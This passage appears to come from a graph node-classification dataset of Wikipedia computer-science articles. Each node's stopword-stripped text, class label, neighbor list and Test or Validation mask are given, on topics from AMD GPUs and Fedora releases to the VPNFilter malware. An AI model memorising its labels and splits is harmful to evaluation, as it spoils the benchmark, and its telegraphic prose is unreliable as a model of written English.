vector registers v0 v1 etc represent set 64 4 bytes numbers operate vector registers every operation done parallel 64 numbers every time work actually work 64 inputs example work 64 different pixels time inputs slightly different thus get slightly different color end every simd-vu room 512 scalar registers 256 vector registers cu scheduler hardware functional block choosing simd-vu wavefronts execute picks one simd-vu per cycle scheduling confused schedulers hardware software gcn-gpus “ wavefront ” consists 64 threads nvidia gpus “ warp ” consists 32 threads amd solution attribute multiple wavefronts simd-vu hardware distributes registers different wavefronts one wavefront waiting result lies memory cu scheduler decides make simd-vu work another wavefront wavefronts attributed per simd-vu simd-vus exchange wavefronts max 10 wavefronts attributed per simd-vu thus 40 per cu amd codexl shows tables relationship number sgprs vgprs number wavefronts basically sgprs min 104 512/numwavefronts vgprs 256/numwavefronts note conjunction sse instructions concept basic level parallelism often called vector width vector width characterized total number bits simd vector unit simd-vu 10 wavefront instruction buffer takes 4 cycles execute one wavefront many implementations gcn typically accompanied several amd asic blocks including limited unified video decoder video coding engine amd trueaudio preview 2011 anandtech wrote unified virtual memory supported graphics core next specific hsa features implemented hardware need support operating system kernel subsystems and/or specific device drivers example july 2014 amd published set 83 patches merged linux kernel mainline 3.17 supporting graphics core next-based radeon graphics cards special driver titled hsa kernel driver resides directory /drivers/gpu/hsa drm-graphics device drivers reside /drivers/gpu/drm augments already existent drm driver radeon cards first implementation focuses single works alongside existing radeon kernel graphics driver kgd used perform scheduling offload assignment compute queues aces driver hardware buffering queues least one empty queue least one ace causing hws immediately assign buffered queues aces queues full queues safely assign part scheduling work performed includes prioritized queues allow critical tasks run higher priority tasks without requiring lower priority tasks preempted run high priority task therefore allowing tasks run concurrently high priority tasks scheduled hog gpu much possible letting tasks use resources high priority tasks using essentially asynchronous compute engines lack dispatch controllers first introduced fourth generation gcn microarchitecture present third generation gcn microarchitecture internal testing purposes driver update enabled hardware schedulers third generation gcn parts production use unit discards degenerate triangles enter vertex shader triangles cover fragments enter fragment shader unit introduced fourth generation gcn microarchitecture asynchronous compute engines controlling computation dispatching zerocore power long idle power saving technology shutting functional units gpu use amd zerocore power technology supplements amd powertune discrete gpus southern islands family gcn 2nd generation introduced radeon hd 7790 also found radeon hd 8770 r7 260/260x r9 290/290x r9 295x2 r7 360 r9 390/390x well steamroller-based desktop kaveri apus mobile kaveri apus puma-based beema mullins apus multiple advantages original gcn including freesync support amd trueaudio revised version amd powertune technology gcn 2nd generation introduced entity called shader engine se shader engine comprises one geometry processor 44 cus hawaii chip rasterizers rops l1 cache part shader engine graphics command processor 8 aces l2 cache memory controllers well audio video accelerators display controllers 2 dma controllers pcie interface a10-7850k kaveri contains 8 cus compute units 8 asynchronous compute engines independent scheduling work item dispatching amd developer summit apu november 2013 michael mantor presented radeon r9 290x discrete gpus sea islands family integrated apus gcn 3rd generation introduced 2014 radeon r9 285 r9 m295x tonga gpu features improved tessellation performance lossless delta color compression order reduce memory bandwidth usage updated efficient instruction set new high quality scaler video new multimedia engine video encoder/decoder delta color compression supported mesa however double precision performance worse compared previous generation discrete gpus integrated apus gpus arctic islands-family introduced q2 2016 amd radeon 400 series 3d-engine i.e gca graphics compute array gfx identical found tonga-chips polaris feature newer display controller engine uvd version 6.3 etc polaris-based chips polaris 30 produced 14 nm finfet process developed samsung electronics licensed globalfoundries slightly newer refreshed polaris 30 built 12 nm lp finfet process node developed samsung globalfoundries fourth generation gcn instruction set architecture compatible third generation optimization 14 nm finfet process enabling higher gpu clock speeds 3rd gcn generation architectural improvements include new hardware schedulers new primitive discard accelerator new display controller updated uvd decode hevc 4k resolutions 60 frames per second 10 bits per color channel discrete gpus fp64 performance gcn 4th generation gpus fp32 performance amd began releasing details next generation gcn architecture termed 'next-generation compute unit january 2017 new design expected increase instructions per clock higher clock speeds support hbm2 larger memory address space discrete graphics chipsets also include hbcc high bandwidth cache controller integrated apus additionally new chips expected include improvements rasterisation render output units stream processors heavily modified previous generations support packed math rapid pack math technology 8-bit 16-bit 32-bit numbers significant performance advantage lower precision acceptable example processing two half-precision numbers rate single single precision number nvidia introduced tile-based rasterization binning maxwell big reason maxwell efficiency increase january anandtech assumed vega would finally catch nvidia regarding energy efficiency optimizations due new dsbr draw stream binning rasterizer introduced vega also added support new shader stage – primitive shaders primitive shaders provide flexible geometry processing replace vertex geometry shaders rendering pipeline december 2018 primitive shaders ca n't used required api changes yet done vega 10 vega 12 use 14 nm finfet process developed samsung electronics licensed globalfoundries vega 20 uses 7 nm finfet process developed tsmc discrete gpus integrated apus double-precision floating-point fp64 performance gcn 5th generation gpus except vega 20 fp32 performance vega 20 fp32 performance gcn 5th generation gpus support half-precision floating-point fp16 calculations double fp32 performance",
    "neighbors": [
      3586,
      9475,
      3204,
      9092,
      10375,
      5645,
      398,
      10512,
      9489,
      7699,
      3615,
      2719,
      2850,
      6818,
      9122,
      10658,
      9391,
      11183,
      6705,
      9400,
      8126,
      6978,
      8514,
      1480,
      3272,
      11080,
      2764,
      9551,
      7122,
      9427,
      10966,
      344,
      10971,
      11485,
      5598,
      5859,
      2277,
      1510,
      9707,
      876,
      4332,
      5356,
      5363,
      2036,
      2935,
      3197,
      2943
    ],
    "mask": "Test"
  },
  {
    "node_id": 11131,
    "label": 2,
    "text": "Start_Input/Output:start input/output mvs/370 successor versions ibm mainframe operating systems start input/output startio macro instruction branch entry low-level device access programmer responsible providing list device-specific ccws channel program executed i/o channels control units devices number exits several may immediate returns input/output supervisor ios invokers startio must supervisor mode key 0 startio interfaces directly ios component mvs start input/output differs excp including xdap simply dasd-only subset excp excpvr following fundamental way start input/output low level facility supports e.g. selection channel paths selection exposures execute channel program high level facility supports e.g. ccw translation page fixing serialization related requests vio callers execute channel program must tcb mode ibm documents excpvr privileged unprivileged access method code uses sam-e processing dasd data sets except special cases application may use execute channel program data control block dcb opened made accessible application system open/close/end-of-volume supervisor services svcs 19 20 55 respectively callers startio must privileged must page fix storage areas related request must use global storage srb/iosb may refer device real ucb even device allocated address space device need opened startio initiation sequence usually referred front end may tcb mode srb mode startio termination sequence usually referred back end always srb mode startio always utilizes srb/iosb pair srb service request block utilized schedule processor activity required available processor connection related i/o request i/o request necessarily run processor caller running indeed cases iosb input/output supervisor block describes related i/o request passes parameters receives responses ios ios generally calls appendages enabled srb mode special cases calls appendage disabled interrupt exit die unit control block ucb device points device descriptor table ddt identified routines needed device dependent processing e.g. handling attention interrupts appending reserve ccws appending set file mask seek although use startio customers supported ibm nevertheless macro instruction associated branch entry remained remarkably stable throughout forty-year-long 2014 transition mvs/370 z/os startio sole method performing lowest-level physical i/o operations channel-attached devices mvs/370 subsequent instances os particular vsam vtam use startio course excp xdap excpvr certain instances ims/vs jes particularly channel-to-channel operations involved additional branch entry added es/390 performs essentially function original retained compatibility existing programs additional branch entry implicitly obtains address related tcb psatold rather explicitly obtaining tcb= keyword parameter original branch entry catastrophic error occur ios processing related i/o request tcb usually caller job step tcb abnormally terminated whichever tcb happened active error detected basic design ios run asynchronously tasks address spaces could tcb address space indeed tcb e.g. srb perhaps likely system wait task runs os master scheduler address space perhaps best description startio application white paper entitled start input/output interface mvs written peter haas amdahl corp subsequently liquidated haas white paper contained application program example illustrated required optional parameters exits employed startio interface detailed description excp vr startio available logic manual",
    "neighbors": [
      11656,
      7312,
      11024,
      663,
      7195,
      7836,
      4645,
      7983,
      10415,
      4535,
      2616,
      8393,
      10958,
      8911,
      3669,
      10072,
      8290,
      868,
      7272,
      4586,
      10094,
      11381,
      6647
    ],
    "mask": "Test"
  },
  {
    "node_id": 11132,
    "label": 9,
    "text": "Turing_(programming_language):turing programming language turing pascal-like programming language developed 1982 ric holt james cordy university toronto toronto ontario canada turing descendant euclid pascal sp/k features clean syntax precise machine-independent semantics turing 4.1.0 latest stable version turing turing 4.1.1 turing 4.1.2 allow stand alone .exe files created versions turing 4.1.0 outdated syntax outdated functions named british computer scientist alan turing turing used primarily teaching language high school university level two versions exist object-oriented turing turing plus systems programming variant september 2001 object oriented turing renamed turing original turing renamed classic turing turing longer supported holt software associates toronto ontario currently microsoft windows supported platform turing widely used high schools ontario introduction programming november 28 2007 turing previously commercial programming language became freeware available download developer website free charge personal commercial educational use. ref name= holtsoft/old_index /ref makers turing holt software associates since ceased operations turing seen development since november 25 2007 turing designed lightweight readable intuitive syntax entire hello world program turing syntax highlighting turing avoids semicolons braces using explicit end markers language constructs instead allows declarations anywhere complete program defining using traditional recursive function calculate factorial currently two open source alternative implementations turing open turing open source version original interpreter tplus native compiler concurrent systems programming language variant turing plus opent project develop compiler turing longer development open turing open-source implementation original turing interpreter windows written tristan hume includes speed improvements new features opengl 3d new code editor fully backwards compatible closed-source implementation tplus open-source implementation original non-object-oriented turing systems programming extensions developed university toronto ported linux solaris mac os x queen university late 1990s tplus implements turing+ turing plus concurrent systems programming language based original turing programming language features turing plus eventually subsumed present object-oriented turing language turing plus extends original turing processes monitors specified c.a.r hoare well language constructs needed systems programming binary input-output separate compilation variables absolute addresses type converters features opent abandoned open-source language compiler ide developed members dteam computer science canada shares many similarities turing fully backwards compatible addition usual graphics drawing functions turing features special functions drawing maple leaves allow easier drawing canadian flag turing+ turing plus concurrent systems programming language based turing programming language designed james cordy ric holt university toronto canada 1987 features turing+ eventually subsumed object-oriented turing turing+ extended original turing processes monitors specified c.a.r hoare well language constructs needed systems programming binary input-output separate compilation variables absolute addresses type converters features turing+ explicitly designed replace concurrent euclid systems-programming applications tunis operating system originally written concurrent euclid recoded turing+ minitunis implementation turing+ used implement several production software systems including txl programming language object-oriented turing extension turing programming language replacement turing plus created ric holt university toronto canada 1991 imperative object-oriented concurrent modules classes single inheritance processes exception handling optional machine-dependent programming integrated development environment x window system demo version versions exist sun-4 mips rs-6000 nextstep windows 95 others",
    "neighbors": [
      9345,
      7234,
      2820,
      8262,
      4423,
      11625,
      6218,
      5612,
      6797,
      2830,
      2895,
      7983,
      8524,
      1016,
      4057,
      2556
    ],
    "mask": "Test"
  },
  {
    "node_id": 11133,
    "label": 5,
    "text": "Dead_Peer_Detection:dead peer detection dead peer detection dpd method detecting dead internet key exchange ike peer method uses ipsec traffic patterns minimize number messages required confirm availability peer dpd used reclaim lost resources case peer found dead also used perform ike peer failover",
    "neighbors": [
      4874,
      10908,
      3742,
      8039
    ],
    "mask": "Validation"
  },
  {
    "node_id": 11134,
    "label": 8,
    "text": "JEUS:jeus jeus abbreviation java enterprise user solution korean web application server developed tmaxsoft jeus provides web application server component tmaxsoft middleware-tier framework solution widely adopted korea holds largest 42.1 share market tmaxsoft released jeus 1.0 2000 2001 received j2ee 1.2 certification jeus 3.0. 2013 received world ’ first java ee 7 certification jeus 8 jeus launched april 2000 following table shows list versions release dates jeus 7 provides following features domain architecture jeus 7 supports massive scale computing environment lightweight speedy distributed clustering dynamic clustering core function enables rapid elasticity allows administrator easily add delete idle resources needed graceful redeployment application redeployment needed operation continuous service environment provided guaranteeing completion processing session requests prior redeployment superior performance provided large-scale requests improved caching function memory managed efficiently use optimized lru processing algorithm improves performance connected webtob server stable large-scale transaction processing ability exhibited due multiplexing i/o request queuing dynamic load balancing stream pipe communication reloading modified class instead entire class function modified development productivity dramatically improved webtob web server component complements jeus tmaxsoft middleware-tier solution webtob uses multi-thread architecture allows address multiple requests single process features include disk memory caching load balancing clustering dynamic queuing ability add additional nodes without interrupting operations help improve server speed stability webtob uses secure sockets layer operates without open firewall ports inherently provides stronger data security administrators also configure access control lists following shows minimum installation requirements jeus windows 2000 2003 xp vista solaris hp-ux aix linux two editions jeus available",
    "neighbors": [
      1920,
      4485,
      7430,
      9229,
      7567,
      7695,
      1937,
      7443,
      8350,
      7457,
      3746,
      2339,
      2596,
      3237,
      8994,
      8998,
      9125,
      11682,
      7338,
      9387,
      44,
      5677,
      7983,
      10800,
      11439,
      6714,
      8122,
      10622,
      1991,
      595,
      1363,
      4439,
      3545,
      225,
      1250,
      865,
      2404,
      4837,
      6379,
      5612,
      9580,
      2287,
      11376,
      8691,
      10611,
      11386,
      3966
    ],
    "mask": "Validation"
  },
  {
    "node_id": 11135,
    "label": 2,
    "text": "Fedora_version_history:fedora version history fedora popular linux distribution developed community-supported fedora project sponsored red hat fedora attempts maintain six-month release schedule offering new versions may november although releases experienced minor delays releases red hat linux listed fedora 30 released april 30 2019 fedora 29 released october 30 2018. notable new features fedora modularity across variants new optional package repository called modular also referred application stream appstream gnome 3.30 zram arm images fedora scientific vagrant images fedora 28 released may 1 2018 red hat enterprise linux 8 derivatives based fedora 28. notable new features modular software repository curated 3rd-party software repositories fedora 27 released november 14 2017 workstation edition fedora 27 features gnome 3.26 display network configuration panels updated along overall settings panel appearance improvement system search shows results including system actions release also features libreoffice 5.4 fedora 26 released july 11 2017 fedora 25 released november 22 2016 notable changes see use wayland display system unicode 9 php 7.0 node.js 6 ibus emoji typing fedora 24 released june 21 2016 notable system wide changes see use gnome 3.20 gcc 6 python 3.5 fedora 23 released november 3 2015 see also fedora 22 released may 26 2015 major features include fedora 21 first version without codename released december 9 2014 fedora 20 codenamed heisenbug released december 17 2013 features fedora 20 include fedora 19 codenamed schrödinger cat released july 2 2013 red hat enterprise linux 7 derivatives based fedora 19 features fedora 19 include fedora 18 codenamed spherical cow released january 15 2013 features fedora 18 include next release operating system fedora 17 codenamed beefy miracle released may 29 2012 features fedora 17 include fedora 16 codenamed verne released november 8 2011 fedora 16 also dedicated memory dennis ritchie died month release features fedora 16 included fedora 15 codenamed lovelock released may 24 2011 features fedora 15 include fedora 14 codenamed laughlin released november 2 2010 features fedora 14 include fedora 13 codenamed goddard released may 25 2010 early development fedora project-leader paul frields anticipated looking fit finish issues tended build really tight ship fedora want make décor cabins little sumptuous polish deck chairs railings features fedora 13 include fedora 12 codenamed constantine released november 17 2009 red hat enterprise linux 6 derivatives based fedora 12 features fedora 12 fedora 11 codenamed leonidas released june 9 2009 first release whose artwork determined name instead users voting themes features fedora 11 fedora 10 codenamed cambridge released november 25 2008 flaunts new solar artwork features include fedora 9 codenamed sulphur released may 13 2008 new features fedora 9 included fedora 9 featured new artwork entitled waves like infinity fedora 8 changes wallpaper reflect time day fedora 8 codenamed werewolf released november 8 2007 new features updates fedora 8 included fedora 8 also included new desktop artwork entitled infinity new desktop theme called nodoka unique feature infinity wallpaper change day reflect time day february 2008 new xfce live cd spin announced x86 x86-64 architectures live cd version uses xfce desktop environment aims fast lightweight still visually appealing easy use like gnome kde spins xfce spin installed hard disk fedora 7 codenamed moonshine released may 31 2007 biggest difference fedora core 6 fedora 7 merging red hat core community extras repositories dropping core name fedora core new build system put place manage packages release used entirely new build compose tools enabled user create fully customized fedora distributions could also include packages third party provider three official spins available fedora 7 fedora 7 featured gnome 2.18 kde 3.5 new theme entitled flying high openoffice.org 2.2 firefox 2.0 fast user switching fully integrated enabled default also number updates selinux including new setroubleshoot tool debugging selinux security notifications new comprehensive system-config-selinux tool fine-tuning selinux setup two core releases introduced specific artwork defined trend continued later fedora versions fedora core 5 released march 20 2006 codename bordeaux introduced fedora bubbles artwork first fedora release include mono tools built beagle f-spot tomboy also introduced new package management tools pup pirut see yellowdog updater modified also first fedora release include long deprecated kept compatibility linuxthreads replaced native posix thread library fedora core 6 released october 24 2006 codenamed zod release introduced fedora dna artwork replacing fedora bubbles artwork used fedora core 5 codename derived infamous villain general zod superman dc comic books version introduced support compiz compositing window manager aiglx technology enables gl-accelerated effects standard desktop shipped firefox 1.5 default web browser smolt tool allows users inform developers hardware use fedora core 1 first version fedora released november 6 2003 codenamed yarrow fedora core 1 based red hat linux 9 shipped version 2.4.19 linux kernel version 2.4 gnome desktop environment k desktop environment 3.1 fedora core 2 released may 18 2004 codenamed tettnang shipped linux 2.6 gnome 2.6 kde 3.2 selinux selinux disabled default due concerns radically altered way fedora core ran xfree86 replaced newer x.org merger previous official x11r6 release additionally included number updates xrender xft xcursor fontconfig libraries significant improvements fedora core 3 released november 8 2004 codenamed heidelberg first release fedora core include mozilla firefox web browser well support indic scripts release also saw lilo boot loader deprecated favour grub selinux also enabled default new targeted policy less strict policy used fedora core 2 fedora core 3 shipped gnome 2.8 kde 3.3 first release include new fedora extras repository fedora core 4 released june 13 2005 codename stentz shipped linux 2.6.11 kde 3.4 gnome 2.10 version introduced new clearlooks theme inspired red hat bluecurve theme also shipped openoffice.org 2.0 office suite well xen high performance secure open source virtualization framework also introduced support powerpc cpu architecture 80 new policies selinux",
    "neighbors": [
      9353,
      2955,
      2197,
      2199,
      411,
      929,
      9762,
      6694,
      8998,
      5165,
      8621,
      1584,
      11057,
      6338,
      8772,
      8520,
      6910,
      3033,
      11610,
      2651,
      8439,
      9564,
      9438,
      4961,
      5988,
      5222,
      5096,
      8554,
      8683,
      5356,
      9964,
      7022,
      9455,
      499,
      4852,
      246,
      8438,
      5243,
      8700,
      1150,
      8447
    ],
    "mask": "Test"
  },
  {
    "node_id": 11136,
    "label": 7,
    "text": "Oracle_RAC:oracle rac database computing oracle real application clusters rac — option oracle database software produced oracle corporation introduced 2001 oracle9i — provides software clustering high availability oracle database environments oracle corporation includes rac enterprise edition provided nodes clustered using oracle clusterware oracle rac allows multiple computers run oracle rdbms software simultaneously accessing single database thus providing clustering non-rac oracle database single instance accesses single database database consists collection data files control files redo logs located disk instance comprises collection oracle-related memory background processes run computer system oracle rac environment 2 instances concurrently access single database allows application user connect either computer access single coordinated set data instances connected interconnect enables instances sync accessing data main aim oracle rac implement clustered database provide performance scalability resilience high availability data instance level oracle rac depends infrastructure component oracle clusterware coordinate multiple servers sharing data storage fan fast application notification technology detects down-states rac administrators use codice_1 tool manage rac configurations prior oracle 9 network-clustered oracle databases used storage device data-transfer medium meaning one node would write data block disk another node would read data disk inherent disadvantage lackluster performance oracle 9i addressed issue rac uses dedicated network connection communications internal cluster since computers/instances rac access database overall system must guarantee coordination data changes different computers whenever computer queries data receives current version — even another computer recently modified data oracle rac refers functionality cache fusion cache fusion involves ability oracle rac fuse in-memory data cached physically separately computer single global cache oracle grid naming service gns handles name resolution cluster registry trace file analyzer tfa aids collecting rac diagnostic data relative single-instance oracle database oracle rac adds additional complexity database automation makes sense single-instance databases becomes even necessary clustered databases increased complexity oracle real application clusters rac introduced oracle 9i 2001 supersedes oracle parallel server ops database option whereas oracle9i required external clusterware known vendor clusterware like trucluster veritas cluster server sun cluster unix flavors except linux windows oracle provided free clusterware called cluster ready services crs oracle 10g oracle clusterware product available operating systems release oracle database 10g release 2 10.2 cluster ready services renamed oracle clusterware using oracle 10g higher oracle clusterware clusterware need platforms oracle rac operates except tru cluster case need vendor clusterware still use clusterware vendors clusterware certified oracle rac rac write-transaction must take ownership relevant area database typically involves request across cluster interconnection local ip network transfer data-block ownership another node one wishing write takes relatively long time tens milliseconds compared single database-node using in-memory operations many types applications time spent coordinating block access across systems low relative many operations system rac scale comparably single system moreover high read-transactional databases data-warehousing applications work well rac need ownership-transfer exists oracle 11g made many enhancements area performs lot better earlier versions read-only workloads overhead resource mastering ownership-transfer minimal fewer three nodes request resource cluster obtained maximum three hops owner-master-requestor makes oracle rac horizontally scalable many nodes application vendors sap use oracle rac demonstrate scalability application biggest oltp benchmarks oracle rac oracle rac 11g supports 100 nodes applications rac may require careful application partitioning enhance performance application scales linearly smp machine may scale linearly rac however application scale linearly smp scale ported rac short application scalability based well application scales single instance shared-nothing shared-everything architectures advantages dbms vendors industry analysts regularly debate matter example microsoft touts comparison sql server 2005 oracle 10g rac oracle corporation offered shared nothing architecture rdbms advent ibm sp sp2 release 7.x mpp editions virtual shared drives vsd used create shared everything implementation shared nothing architecture shared-everything architectures share data disk data memory nodes cluster contrast shared-nothing architectures share none commercially available databases offer shared-everything architecture ibm db2 z/os ibm mainframe operating-system provided high-performance data-sharing option since mid-1990s ibm released mainframe hardware software-clustering infrastructure late 2009 ibm announced db2 purescale shared-disk clustering scheme db2 9.8 aix mimics parallel sysplex implementation behind db2 data sharing mainframe february 2008 sybase released adaptive server enterprise cluster edition resembles oracle rac shared-everything design although technically shared-everything sybase also provides column-based relational database focused analytic datawarehouse applications called sybase iq configured run shared disk mode shared-nothing architectures share neither data disk data memory nodes cluster contrast shared-everything architectures share competitive products offering shared-nothing architectures include",
    "neighbors": [
      8195,
      8969,
      9867,
      270,
      10511,
      19,
      10389,
      11030,
      11552,
      6433,
      8229,
      9782,
      5047,
      8128,
      6480,
      4817,
      2901,
      4696,
      5210,
      7649,
      10340,
      6383,
      2168,
      7802,
      3323,
      4604
    ],
    "mask": "Test"
  },
  {
    "node_id": 11137,
    "label": 2,
    "text": "IPSW:ipsw ipsw ipod software file format used itunes install ios firmware apple devices share ipsw file format ios firmware allowing users flash devices itunes macos windows .ipsw file compressed archive file similar zip archive containing three apple disk image files one containing root file system ios two ram disks restore update file also holds firmware folder contains ibss ibec dfu battery images low full charging also baseband firmware files .bbfw format baseband firmware two files named build manifest restore manifest apple property list .plist format checks compatibility holds hashes base64 format instructs device find specific firmware parts restore buildmanifest.plist sent apple tss server checked order obtain shsh blob every restore without shsh blobs firmware refuse restore thus making downgrades impossible official fashion due apple limitation archive password-protected dmg images inside encrypted aes apple release keys extracted using different iboot bootloader exploits limera1n created george hotz commonly known geohot since many tools created decryption modification root file system 2015 san bernardino attack fbi recovered shooter iphone 5c belonged san bernardino county department public health fbi recovered icloud backups one half months shooting wanted access encrypted files device u.s. government ordered apple produce ipsw file would allow investigators brute force passcode iphone order used writs act originally created judiciary act 1789 demand firmware way smartphone manufacturers ordered comply tim cook responded company webpage outlining need encryption arguing produce backdoor one device would inevitably used compromise privacy iphone users",
    "neighbors": [
      9732,
      11173,
      11430,
      10857,
      107,
      9518,
      2095,
      4657,
      3921,
      8115,
      1276,
      4957,
      7614
    ],
    "mask": "Test"
  },
  {
    "node_id": 11138,
    "label": 4,
    "text": "PARAFE:parafe parafe abbreviation passage automatisé rapide aux frontières extérieures automated fast-track crossing external borders passport verification program operated france direction centrale de la police aux frontières dcpaf border police parafe incorporating automated self-service barriers operated dcpaf located immigration checkpoints arrival departure halls paris marseille nice lyon airports london st. pancras train station offering alternative using desks staffed immigration officers gates use facial recognition technology verify user identity data stored chip biometric passport present european economic area swiss citizens use parafe egates provided aged 18 years holding valid biometric passports minors aged 12-17 also use gates certain arrival controls never departure french authorities strict rules unaccompanied minors leaving country use parafe gates traveller must biometric passport france certain countries epassports biometric logo front cover passports biometric logo front cover computer gate scanner reads information contained chip inside passport camera takes picture passenger biometric patterns verified picture saved passport chip epassport gate scanner reads information contained chip inside passport runs data numerous databases determine traveller security risk camera takes picture traveller officer control station behind gates checks image captured camera matches one passport facial recognition data verification facial recognition process complete doors automatically either open signifying traveller permitted enter and/or exit country remain closed stop icon illuminate demonstrating traveller failed security checks personally meet immigration officials present parafe egates available following locations previous generation parafe egates used fingerprint technology verify identity passenger first introduced 2010 phased since considered insufficiently intuitive hand finger slower process non-french citizens actively sign french airport every 5 years able use egates first egates replaced early 2017 pilot project facial recognition technology extended airports st pancras station throughout rest 2017 2018 still gates left work fingerprint technology new registrations still accepted",
    "neighbors": [
      10685,
      8038
    ],
    "mask": "None"
  },
  {
    "node_id": 11139,
    "label": 3,
    "text": "Jack_the_Nipper_II:_In_Coconut_Capers:jack nipper ii coconut capers jack nipper ii coconut capers video game gremlin graphics released 1987 several home computer systems sequel jack nipper following naughty exploits jack nipper jack family exiled australia unhappy jack jumped plane using nappy parachute finds middle african jungle surrounded dangerous animals natives father also following close behind determined give boy good spanking jack must cause much mischief possible avoiding punishment previous game jack nipper ii side-view flip screen game puzzle solving platform elements however false-3d effect removed making gameplay pure 2d jack must perform naughty pranks time human animal inhabitants jungle evading father hot pursuit game reviewed 1990 dragon 158 hartley patricia kirk lesser role computers column part mastertronic mega pack 10 games previously released europe reviewers gave game 3½ 5 stars calling rather cute arcade game on-screen character running around africa",
    "neighbors": [
      10931,
      11053,
      9006
    ],
    "mask": "None"
  },
  {
    "node_id": 11140,
    "label": 4,
    "text": "VPNFilter:vpnfilter vpnfilter malware designed infect routers certain network attached storage devices 24 may 2018 estimated infected approximately 500,000 routers worldwide though number at-risk devices larger steal data contains kill switch designed disable infected router command able persist user reboot router fbi believes created russian fancy bear group vpnfilter malware infecting number different kinds network routers storage devices seems designed part target serial networking devices using modbus protocol talk control industrial hardware factories warehouses malware special dedicated code target control systems using scada initial infection vector still unknown cisco talos security group hypothesizes malware exploits known router security vulnerabilities infect devices software installs multiple stages vpnfilter uses multiple third stage operations initial infection one function vpnfilter sniff network data network connected infected device gather credentials supervisory control data data encrypted exfiltrated via tor network also serve relay point hide origin subsequent attacks cisco symantec suggest people affected devices factory reset typically accomplished using small pointed object straightened paperclip push small reset button back unit 10 30 seconds time varies model remove malware also restores router original settings router remote management enabled factory reset often disable default setting many routers remote management thought one possible vector initial attack connecting factory-reset router internet device default passwords changed prevent reinfection initial worm installs vpnfilter attack devices running embedded firmware based busybox linux compiled specific processors include non-embedded linux devices workstations servers manufacturer-provided firmware following router models known risk vpnfilter described cisco talos infected many 500,000 devices worldwide perhaps 54 different countries though proportionately focus ukraine fbi taken high-profile role addressing malware conducting investigation resulted seizure domain name toknowall.com ostensibly used redirect queries stage 1 malware allowing locate install copies stages 2 3 us justice department also compelled site photobucket disable known urls used distribute malware stage 2 25 may 2018 fbi recommended users reboot at-risk devices would temporarily remove stages 2 3 malware stage 1 would remain leading router try re-downloading payload infecting router however prior recommendation us justice department seized web endpoints malware uses stage 2 installation without urls malware must rely fallback socket listener stage 2 installation method requires threat actor command control systems contact system install stage 2 increasing threat actor risk identified fbi recommended users disable remote management devices update firmware firmware update removes stages malware though possible device could reinfected fbi said would help find servers distributing payload",
    "neighbors": [
      9569,
      8997,
      5000,
      823,
      2041,
      7515
    ],
    "mask": "Test"
  },
  {
    "node_id": 11141,
    "label": 9,
    "text": "Expression_problem:expression problem expression problem term used discussing strengths weaknesses various programming paradigms programming languages philip wadler coined term response discussion rice university programming languages team plt expression problem new name old problem goal define datatype cases one add new cases datatype new functions datatype without recompiling existing code retaining static type safety e.g. casts ecoop '98 krishnamurthi et al presented design pattern solution problem simultaneously extending expression-oriented programming language tool-set dubbed expressivity problem thought programming language designers could use problem demonstrate expressive power creations plt problem shown construction drscheme drracket solved via rediscovery mixins avoid using programming language problem paper programming languages krishnamurthi et al used old geometry programming problem explain pattern-oriented solution conversations felleisen krishnamurthi ecoop presentation wadler understood pl-centric nature problem pointed krishnamurthi solution used cast circumvent java type system discussion continued types mailing list corky cartwright rice kim bruce williams showed type systems oo languages might eliminate cast response wadler formulated essay stated challenge whether language solve expression problem salient indicator capacity expression label expression problem puns expression much language express expression terms trying represent language expressions others co-discovered variants expression problem around time rice university plt particular thomas kühne dissertation smaragdakis batory parallel ecoop 98 article follow-up work used expression problem showcase power programming language designs expression problem also fundamental problem multi-dimensional software product line design particular application special case fosd program cubes various solutions expression problem solution varies amount code user must write implement language features require",
    "neighbors": [
      10246,
      5031,
      4392,
      2666,
      369,
      9245
    ],
    "mask": "Test"
  },
  {
    "node_id": 11142,
    "label": 4,
    "text": "Enrique_Salem:enrique salem enrique salem born 1965 president ceo software company symantec 2009 2012 member u.s. president management advisory board salem joined bain capital ventures 2014 focuses infrastructure software services specialization cybersecurity serves boards several bain capital venture portfolio companies including docusign serves independently boards fireeye feye atlassian team forescout fsct currently serves board directors number privately held startups including cloudgenix attivo networks shieldx leapyear awake security shiftleft red balloon security bettercloud rubrik.. salem served board city year san jose 2015 2018 trustee city year salem attended dartmouth college earned bachelor arts ba degree computer science vice president peter norton computing acquired symantec 1990 manager project create norton desktop windows left symantec returned via brightmail acquisition enrique named 2004 entrepreneur year ernst young 2007 corporate executive year hispanic net salem held vice-president positions security pacific merchant bank ask jeeves oblix inc. salem ceo brightmail company made email program designed screen spam email brightmail acquired symantec 2004 brightmail almost two years salem spent total 19 years symantec took john w. thompson symantec ceo april 2009 july 2012 salem became member president barack obama ’ u.s. president management advisory board march 2011 served til end administration",
    "neighbors": [
      9569
    ],
    "mask": "None"
  },
  {
    "node_id": 11143,
    "label": 8,
    "text": "Leaf_Group:leaf group leaf group formerly demand media inc american content company operates online brands including ehow livestrong.com marketplace brands saatchi art society6 company also provides social media platforms existing large company websites distributes content bundled social media tools outlets around web demand media created 2006 former private equity investor shawn colo former chairman myspace richard rosenblatt company employs algorithm identifies topics high advertising potential based search engine query data bids advertising auctions topics typically advice how-to field commissions freelancers produce corresponding text video content content posted variety sites including youtube company sites ehow livestrong.com demand media content media service offering includes leading owned operated online properties publish content text video photography designed visual formats content published across several key categories ehow.com how-to reference do-it-yourself destination livestrong.com health healthy living destination certain niche properties focused specific interests also owns operates leaftv lifestyle resource women produces short-form how-to videos covering stylish living food fashion additionally studiod business develops executes content marketing strategies creates custom content third-party brands agencies publishers marketplaces service offering demand media operates two art design marketplaces large communities artists market sell original artwork original designs printed wide variety products society6.com acquired june 2013 provides artists online commerce platform feature sell original images designs consumer products art prints phone tablet cases t-shirts mugs blankets tapestries wall clocks duvet covers shower curtains throw pillows saatchiart.com acquired august 2014 online art gallery featuring wide selection original paintings drawings sculptures photography provides global community artists curated environment exhibit sell work directly consumers around world 2017 leaf group acquired deny designs modern home furnishings company original designs based colorado demand media co-founded may 2006 richard rosenblatt shawn colo. rosenblatt long history building selling internet media companies chief executive officer intermix media chairman myspace.com rosenblatt one innovators internet social networking colo financial acquisition specialist worked 10 years private equity industry principal spectrum equity investors specializing media communications companies demand media raised 355 million financing first two years investors oak investment partners spectrum equity investors generation partners goldman sachs june 2007 demand media hired charles hilliard former morgan stanley investment banker netzero/united online senior executive initial public offering ipo specialist president chief financial officer acquired byron reese how-to website expertvillage.com austin tx 20 million reese became company chief innovation officer developed algorithm company uses identify topics high advertising potential 2008 demand media acquired 30 domain-name portfolios owned 65 destination websites said 2009 revenue nearly 200 million making profit later reported company never profitable july 2008 reported yahoo interested buying demand media 1.5 billion 2 